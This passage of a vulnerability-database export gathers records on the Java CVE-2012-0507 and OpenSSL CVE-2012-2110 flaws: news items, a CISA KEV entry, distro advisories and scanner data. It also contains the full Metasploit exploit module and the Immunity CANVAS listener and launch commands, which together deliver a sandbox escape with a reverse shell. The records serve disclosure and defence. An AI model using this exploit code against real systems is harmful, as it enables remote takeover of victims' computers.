had been used by hackers from various countries to target Tibet. The creator hailed from China.\n", "cvss3": {}, "published": "2012-12-05T03:48:00", "type": "thn", "title": " New Mac Malware 'Dockster' Found on Dalai Lama site", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0507"], "modified": "2012-12-05T14:48:12", "id": "THN:74600659E59FBC081B6540EF1DCE11D3", "href": "http://thehackernews.com/2012/12/new-mac-malware-dockster-found-on-dalai.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-05-11T00:22:22", "description": "**RedKit Exploit Kit** : New web malware exploitation pack \n\n\n[![The Hacker News](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/images/-qhaOFk4KkyY/T6WMpVqp5QI/AAAAAAAAGCw/itUPRLy0FxE/s728-e365/RedKit+Exploit+Kit+New+web+malware+exploitation+pack.png>)\n\n \n\n\nTrustwave researchers have spotted a new exploit kit called \"**RedKit Exploit Kit**\" that being used in the wild is aiming to enter a market that is practically monopolized by the widely famous BlackHole and Phoenix exploit kits.\n\n \n\n\nIn actual, The new kit has no official name, so the researchers dubbed it '**Redkit**' due to the red bordering used in the application's panel.\n\n \n\n\n\"_**Logging to the admin panel presents you with options which are typically used by other exploit kits. The panel allows you to check the statistics for incoming traffic, upload a payload executable and even scan this payload with no less than 37 different AV's**_,\" Trustwave [reports](<https://blog.spiderlabs.com/2012/05/a-wild-exploit-kit-appears.html>).\n\n \n\n\nTo deliver the malware, RedKit exploits two popular bugs:\n\n**1.)** The Adobe Acrobat and Reader LibTIFF vulnerability ([CVE-2010-0188](<https://vulners.com/cve/CVE-2010-0188>)).\n\n**2.)** The Java AtomicReferenceArray vulnerability ([CVE-2012-0507](<https://vulners.com/cve/CVE-2012-0507>)), lately used by the criminals behind the massive Flashback infection.\n\n[![The Hacker News](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/images/-A8BHujRUats/T6WN-4ajjFI/AAAAAAAAGC4/gZveQvkr1V0/s728-e365/av.png>)\n\n \n\n\n\"**_As each malicious URL gets blocked by most security firms after 24 to 48 hours, the Redkit's author have provide a new API which will produce a fresh URL every hour, so that customer of this exploit kit can now set up an automated process for updating the traffic sources every hour or so to point to the new URL._**\"\n", "cvss3": {}, "published": "2012-05-05T20:31:00", "type": "thn", "title": "RedKit Exploit Kit : New web malware exploitation pack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0188", "CVE-2012-0507"], "modified": "2012-10-08T20:49:26", "id": "THN:66B3577F27CF69B6725ED86CD3853632", "href": "https://thehackernews.com/2012/05/redkit-exploit-kit-new-web-malware.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-12-07T21:42:37", "description": "An incorrect type vulnerability exists in the Concurrency component of Oracle's Java Runtime Environment allows an attacker to remotely execute arbitrary code.", "cvss3": {}, "published": "2022-03-03T00:00:00", "type": "cisa_kev", "title": "Oracle Java SE Runtime Environment (JRE) Arbitrary Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0507"], "modified": "2022-03-03T00:00:00", "id": "CISA-KEV-CVE-2012-0507", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2021-07-28T14:33:36", "description": "**Name**| java_AtomicReferenceArray \n---|--- \n**CVE**| CVE-2012-0507 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Java AtomicReferenceArray Type Confusion Sandbox Bypass \n**Notes**| CVE Name: CVE-2012-0507 \nVENDOR: Sun \nNotes: \nThere is a Type Confusion vulnerability in java.util.concurrent.atomic.AtomicReferenceArray class. \nWhen creating a new instance of an AtomicReferenceArray the array type has to be specified, however the AtomicReferenceArray.set method \ndoes not properly check the object type being inserted. \nThis vulnerability can then be used together with some reflection tricks to disable the Java Security Manager to escape the sandbox. \n \nAffected versions \nJDK and JRE 7 Update 2 and earlier \nJDK and JRE 6 Update 30 and earlier \nJDK and JRE 5.0 Update 33 and earlier \nSDK and JRE 1.4.2_35 and earlier \n \nTested on: \n\\- Windows 7 SP1 with JDK/JRE 7 and 7 update 1 \n\\- Windows 7 SP1 with JDK/JRE 6 update 29 \n\\- Windows 7 SP1 with JDK/JRE 5 update 22 \n\\- Windows XP SP3 with JDK/JRE 7 and 7 update 1 \n \nTo run from command line, first start the listener (UNIVERSAL): \npython commandlineInterface.py -l 192.168.1.10 -p 5555 -v 17 \nAnd then run the exploit from clientd: \npython ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:java_AtomicReferenceArray -O allowed_recon_modules:js_recon -O auto_detect_exploits:0 \n \n \nRepeatability: Infinite (client side - no crash) \nReferences: http://weblog.ikvm.net/CommentView.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3 \nhttp://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html \nDate public: 02/14/2012 \n\n", "cvss3": {}, "published": "2012-06-07T22:55:00", "type": "canvas", "title": "Immunity Canvas: JAVA_ATOMICREFERENCEARRAY", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0507"], "modified": "2012-06-07T22:55:00", "id": "JAVA_ATOMICREFERENCEARRAY", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/java_AtomicReferenceArray", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2022-11-03T01:46:38", "description": "This module exploits a vulnerability due to the fact that AtomicReferenceArray uses the Unsafe class to store a reference in an array directly, which may violate type safety if not used properly. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.\n", "cvss3": {}, "published": "2012-03-29T15:31:14", "type": "metasploit", "title": "Java AtomicReferenceArray Type Violation Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0507"], "modified": "2022-02-16T23:22:40", "id": "MSF:EXPLOIT-MULTI-BROWSER-JAVA_ATOMICREFERENCEARRAY-", "href": "https://www.rapid7.com/db/modules/exploit/multi/browser/java_atomicreferencearray/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({ :javascript => false })\n\n def initialize( info = {} )\n super( update_info( info,\n 'Name' => 'Java AtomicReferenceArray Type Violation Vulnerability',\n 'Description' => %q{\n This module exploits a vulnerability due to the fact that\n AtomicReferenceArray uses the Unsafe class to store a reference in an\n array directly, which may violate type safety if not used properly.\n This allows a way to escape the JRE sandbox, and load additional classes\n in order to perform malicious operations.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Jeroen Frijters', #Initial discovery according to his blog\n 'sinn3r', # metasploit module\n 'juan vazquez', # metasploit module\n 'egypt' # added support for older java versions\n ],\n 'References' =>\n [\n ['CVE', '2012-0507'],\n ['OSVDB', '80724'],\n ['BID', '52161'],\n ['URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3'],\n ['URL', 'http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx'],\n ['URL', 'http://schierlm.users.sourceforge.net/TypeConfusion.html'],\n ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507'],\n ['URL', 'https://www.rapid7.com/blog/post/2012/03/29/cve-2012-0507--java-strikes-again']\n ],\n 'Platform' => %w{ java linux osx solaris win },\n 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },\n 'Targets' =>\n [\n [ 'Generic (Java Payload)',\n {\n 'Platform' => ['java'],\n 'Arch' => ARCH_JAVA,\n }\n ],\n [ 'Windows x86 (Native Payload)',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n }\n ],\n [ 'Mac OS X PPC (Native Payload)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_PPC,\n }\n ],\n [ 'Mac OS X x86 (Native Payload)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X86,\n }\n ],\n [ 'Linux x86 (Native Payload)',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2012-02-14'\n ))\n end\n\n\n def exploit\n # load the static jar file\n path = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2012-0507.jar\" )\n fd = File.open( path, \"rb\" )\n @jar_data = fd.read(fd.stat.size)\n fd.close\n\n super\n end\n\n\n def on_request_uri( cli, request )\n data = \"\"\n host = \"\"\n port = \"\"\n\n if not request.uri.match(/\\.jar$/i)\n if not request.uri.match(/\\/$/)\n send_redirect( cli, get_resource() + '/', '')\n return\n end\n\n print_status(\"Sending #{self.name}\")\n\n payload = regenerate_payload( cli )\n if not payload\n print_error(\"Failed to generate the payload.\" )\n return\n end\n\n if target.name == 'Generic (Java Payload)'\n if datastore['LHOST']\n jar = payload.encoded\n host = datastore['LHOST']\n port = datastore['LPORT']\n vprint_status(\"Sending java reverse shell\")\n else\n port = datastore['LPORT']\n host = cli.peerhost\n vprint_status( \"Java bind shell\" )\n end\n if jar\n print_status( \"Generated jar to drop (#{jar.length} bytes).\" )\n jar = Rex::Text.to_hex( jar, prefix=\"\" )\n else\n print_error(\"Failed to generate the executable.\" )\n return\n end\n else\n\n # NOTE: The EXE mixin automagically handles detection of arch/platform\n data = generate_payload_exe\n\n print_status(\"Generated executable to drop (#{data.length} bytes).\" )\n data = Rex::Text.to_hex( data, prefix=\"\" )\n\n end\n\n send_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } )\n return\n end\n\n print_status(\"Sending jar\")\n send_response( cli, generate_jar(), { 'Content-Type' => \"application/octet-stream\" } )\n\n handler( cli )\n end\n\n def generate_html( data, jar, host, port )\n jar_name = rand_text_alpha(rand(6)+3) + \".jar\"\n\n html = \"<html><head></head>\"\n html += \"<body>\"\n html += \"<applet archive=\\\"#{jar_name}\\\" code=\\\"msf.x.Exploit.class\\\" width=\\\"1\\\" height=\\\"1\\\">\"\n html += \"<param name=\\\"data\\\" value=\\\"#{data}\\\"/>\" if data\n html += \"<param name=\\\"jar\\\" value=\\\"#{jar}\\\"/>\" if jar\n html += \"<param name=\\\"lhost\\\" value=\\\"#{host}\\\"/>\" if host\n html += \"<param name=\\\"lport\\\" value=\\\"#{port}\\\"/>\" if port\n html += \"</applet></body></html>\"\n return html\n end\n\n def generate_jar()\n return @jar_data\n end\nend\n\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/java_atomicreferencearray.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "altlinux": [{"lastseen": "2023-05-08T01:42:25", "description": "April 19, 2012 Dmitry V. Levin 1.0.0i-alt1\n \n \n - Updated to 1.0.0i (fixes CVE-2012-2110).\n", "cvss3": {}, "published": "2012-04-19T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 8 package openssl10 version 1.0.0i-alt1", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2110"], "modified": "2012-04-19T00:00:00", "id": "29854C9C533BD3BE8BE79CF49A0F0E8C", "href": "https://packages.altlinux.org/en/p8/srpms/openssl10/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-31T19:19:24", "description": "April 19, 2012 Dmitry V. Levin 1.0.0i-alt1\n \n \n - Updated to 1.0.0i (fixes CVE-2012-2110).\n", "cvss3": {}, "published": "2012-04-19T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 7 package openssl10 version 1.0.0i-alt1", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2110"], "modified": "2012-04-19T00:00:00", "id": "2F595D964EFD3CA5F580A7A7091AE59B", "href": "https://packages.altlinux.org/en/p7/srpms/openssl10/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-31T19:18:34", "description": "April 19, 2012 Dmitry V. Levin 1.0.0i-alt1\n \n \n - Updated to 1.0.0i (fixes CVE-2012-2110).\n", "cvss3": {}, "published": "2012-04-19T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 6 package openssl10 version 1.0.0i-alt1", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2110"], "modified": "2012-04-19T00:00:00", "id": "7111BE9CF908ABA99746CC2472045FC0", "href": "https://packages.altlinux.org/en/p6/srpms/openssl10/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-08T01:48:03", "description": "April 19, 2012 Dmitry V. Levin 1.0.0i-alt1\n \n \n - Updated to 1.0.0i (fixes CVE-2012-2110).\n", "cvss3": {}, "published": "2012-04-19T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 9 package openssl1.1 version 1.0.0i-alt1", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2110"], "modified": "2012-04-19T00:00:00", "id": "9FB4AC40C176DD2B18AB9904CCE6D8F2", "href": "https://packages.altlinux.org/en/p9/srpms/openssl1.1/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-07T11:49:01", "description": "April 19, 2012 Dmitry V. Levin 1.0.0i-alt1\n \n \n - Updated to 1.0.0i (fixes CVE-2012-2110).\n", "cvss3": {}, "published": "2012-04-19T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 9 package openssl10 version 1.0.0i-alt1", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2110"], "modified": "2012-04-19T00:00:00", "id": "E7916C7C736745FA6601CB08A4E5CCB5", "href": "https://packages.altlinux.org/en/p9/srpms/openssl10/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-12-06T16:46:02", "description": "The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL before\n0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1 before 1.0.1a does not properly\ninterpret integer data, which allows remote attackers to conduct buffer\noverflow attacks, and cause a denial of service (memory corruption) or\npossibly have unspecified other impact, via crafted DER data, as\ndemonstrated by an X.509 certificate or an RSA public key.\n\n#### Bugs\n\n * <https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/985870>\n", "cvss3": {}, "published": "2012-04-19T00:00:00", "type": "ubuntucve", "title": "CVE-2012-2110", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2110"], "modified": "2012-04-19T00:00:00", "id": "UB:CVE-2012-2110", "href": "https://ubuntu.com/security/CVE-2012-2110", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-06T16:47:08", "description": "Unspecified vulnerability in the Java Runtime Environment (JRE) component\nin Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, and 5.0\nUpdate 33 and earlier allows remote attackers to affect confidentiality,\nintegrity, and availability via unknown vectors related to Concurrency.\nNOTE: the previous information was obtained from the February 2012 Oracle\nCPU. Oracle has not commented on claims from a downstream vendor and third\nparty researchers that this issue occurs because the AtomicReferenceArray\nclass implementation does not ensure that the array is of the Object[]\ntype, which allows attackers to cause a denial of service (JVM crash) or\nbypass Java sandbox restrictions. NOTE: this issue was originally mapped\nto CVE-2011-3571, but that identifier was already assigned to a different\nissue.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | in natty+, NetX and the plugin moved to the icedtea-web package \n[sbeattie](<https://launchpad.net/~sbeattie>) | initially, oracle misidentified this as CVE-2011-3571; changelogs refer to that CVE instead of this one.\n", "cvss3": {}, "published": "2012-02-24T00:00:00", "type": "ubuntucve", "title": "CVE-2012-0507", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3571", "CVE-2012-0507"], "modified": "2012-02-24T00:00:00", "id": "UB:CVE-2012-0507", "href": "https://ubuntu.com/security/CVE-2012-0507", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T16:48:05", "description": "Unspecified vulnerability in the Virtual Desktop Infrastructure (VDI)\ncomponent in Oracle Virtualization 3.2 allows remote authenticated users to\naffect confidentiality and integrity via unknown vectors related to\nSession. NOTE: this CVE identifier was accidentally used for a Concurrency\nissue in Java Runtime Environment, but that issue has been reassigned to\nCVE-2012-0507.", "cvss3": {}, "published": "2012-01-18T00:00:00", "type": "ubuntucve", "title": "CVE-2011-3571", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.6, "vectorString": "AV:N/AC:H/Au:S/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3571", "CVE-2012-0507"], "modified": "2012-01-18T00:00:00", "id": "UB:CVE-2011-3571", "href": "https://ubuntu.com/security/CVE-2011-3571", "cvss": {"score": 3.6, "vector": "AV:N/AC:H/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2023-12-06T16:45:54", "description": "Multiple integer signedness errors in crypto/buffer/buffer.c in OpenSSL\n0.9.8v allow remote attackers to conduct buffer overflow attacks, and cause\na denial of service (memory corruption) or possibly have unspecified other\nimpact, via crafted DER data, as demonstrated by an X.509 certificate or an\nRSA public key. NOTE: this vulnerability exists because of an incomplete\nfix for CVE-2012-2110.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | 1.0.x not affected by CVE-2012-2131 all releases also have second patch to fix incorrect error code introduced in the fix for CVE-2012-2110\n", "cvss3": {}, "published": "2012-04-24T00:00:00", "type": "ubuntucve", "title": "CVE-2012-2131", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2110", "CVE-2012-2131"], "modified": "2012-04-24T00:00:00", "id": "UB:CVE-2012-2131", "href": "https://ubuntu.com/security/CVE-2012-2131", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2023-12-06T18:25:31", "description": "The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL before 0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1 before 1.0.1a does not properly interpret integer data, which allows remote attackers to conduct buffer overflow attacks, and cause a denial of service (memory corruption) or possibly have unspecified other impact, via crafted DER data, as demonstrated by an X.509 certificate or an RSA public key.", "cvss3": {}, "published": "2012-04-19T17:55:00", "type": "debiancve", "title": "CVE-2012-2110", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2110"], "modified": "2012-04-19T17:55:00", "id": "DEBIANCVE:CVE-2012-2110", "href": "https://security-tracker.debian.org/tracker/CVE-2012-2110", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-07T22:25:40", "description": "Multiple integer signedness errors in crypto/buffer/buffer.c in OpenSSL 0.9.8v allow remote attackers to conduct buffer overflow attacks, and cause a denial of service (memory corruption) or possibly have unspecified other impact, via crafted DER data, as demonstrated by an X.509 certificate or an RSA public key. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-2110.", "cvss3": {}, "published": "2012-04-24T20:55:00", "type": "debiancve", "title": "CVE-2012-2131", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2110", "CVE-2012-2131"], "modified": "2012-04-24T20:55:00", "id": "DEBIANCVE:CVE-2012-2131", "href": "https://security-tracker.debian.org/tracker/CVE-2012-2131", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-12-07T16:38:55", "description": "Multiple numeric conversion errors, leading to a buffer overflow, were found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data from BIO (OpenSSL's I/O abstraction) inputs. Specially crafted DER (Distinguished Encoding Rules) encoded data read from a file or other BIO input could cause an application using the OpenSSL library to crash or, potentially, execute arbitrary code. (CVE-2012-2110)", "cvss3": {}, "published": "2013-09-04T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : openssl (ALAS-2012-72)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:openssl", "p-cpe:/a:amazon:linux:openssl-debuginfo", "p-cpe:/a:amazon:linux:openssl-devel", "p-cpe:/a:amazon:linux:openssl-perl", "p-cpe:/a:amazon:linux:openssl-static", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2012-72.NASL", "href": "https://www.tenable.com/plugins/nessus/69679", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2012-72.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69679);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n script_cve_id(\"CVE-2012-2110\");\n script_xref(name:\"ALAS\", value:\"2012-72\");\n script_xref(name:\"RHSA\", value:\"2012:0518\");\n\n script_name(english:\"Amazon Linux AMI : openssl (ALAS-2012-72)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple numeric conversion errors, leading to a buffer overflow, were\nfound in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One)\ndata from BIO (OpenSSL's I/O abstraction) inputs. Specially crafted\nDER (Distinguished Encoding Rules) encoded data read from a file or\nother BIO input could cause an application using the OpenSSL library\nto crash or, potentially, execute arbitrary code. (CVE-2012-2110)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2012-72.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update openssl' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n 